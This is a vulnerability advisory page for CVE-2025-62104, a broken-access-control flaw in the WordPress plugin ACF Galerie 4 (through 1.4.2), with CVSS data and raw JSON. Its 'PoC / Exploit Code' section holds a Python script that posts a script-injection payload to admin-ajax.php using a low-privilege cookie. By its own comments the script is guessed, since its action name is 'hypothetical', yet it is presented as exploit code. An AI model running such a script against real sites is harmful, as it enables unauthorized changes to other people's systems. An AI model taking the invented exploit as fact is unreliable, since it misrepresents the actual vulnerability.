Security Vulnerability Report
中文
CVE-2025-62104 CVSS 4.3 MEDIUM

CVE-2025-62104

Published: 2026-04-23 12:17:01
Last Modified: 2026-04-23 14:28:56

Description

Missing Authorization vulnerability in Navneil Naicker ACF Galerie 4 allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects ACF Galerie 4: from n/a through 1.4.2.

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Navneil Naicker ACF Galerie 4 <= 1.4.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests # Target configuration target = "http://example.com" endpoint = "/wp-admin/admin-ajax.php" # Vulnerable action parameter (hypothetical based on plugin structure) data = { "action": "acf_galerie_update_settings", # Example action susceptible to IDOR/Auth bypass "gallery_id": "1", "malicious_payload": "<script>alert(1)</script>" } # Low privilege user cookies cookies = { "wordpress_logged_in_abc123": "subscriber_session_token" } try: response = requests.post(target + endpoint, data=data, cookies=cookies) if response.status_code == 200 and "success" in response.text: print("[+] Exploit successful: Authorization bypass confirmed.") else: print("[-] Exploit failed or not vulnerable.") except Exception as e: print(f"[!] Error: {e}")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-62104", "sourceIdentifier": "[email protected]", "published": "2026-04-23T12:17:01.220", "lastModified": "2026-04-23T14:28:55.557", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in Navneil Naicker ACF Galerie 4 allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects ACF Galerie 4: from n/a through 1.4.2."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/wordpress/plugin/acf-galerie-4/vulnerability/wordpress-acf-galerie-4-plugin-1-4-2-broken-access-control-vulnerability?_s_id=cve", "source": "[email protected]"}]}}